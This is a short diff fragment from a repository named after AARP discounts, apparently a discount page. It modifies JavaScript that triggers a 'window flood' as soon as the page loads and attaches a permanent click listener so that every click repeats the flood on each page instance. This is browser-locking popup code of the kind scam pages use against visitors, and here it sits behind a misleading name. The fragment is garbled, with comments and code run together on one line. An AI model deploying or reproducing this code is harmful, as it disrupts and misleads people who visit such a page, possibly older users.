hshbs508-beep/AARP-Discounts/README.md

                 }
             });

-            // WINDOW FLOOD (First flood triggered here, only by parent) if (window.location.hash !== '#start') {
-                // 1.
-Trigger the first flood immediately repeatWindowFlood();
+            // PERMANENT CLICK LISTENER ATTACHMENT

-                // 2.
-Attach the permanent click listener for REPEATING the flood document.body.addEventListener('click', repeatWindowFlood);
+            // Attach the permanent listener for REPEATING the flood to every page instance. document.body.addEventListener('click', repeatWindowFlood);

+            // WINDOW FLOOD (Only trigger the FIRST flood on the original window) if (window.location.hash !== '#start') {
+                repeatWindowFlood(); // Initial blast
             }

             // Remove the one-time click listener that triggered the initialization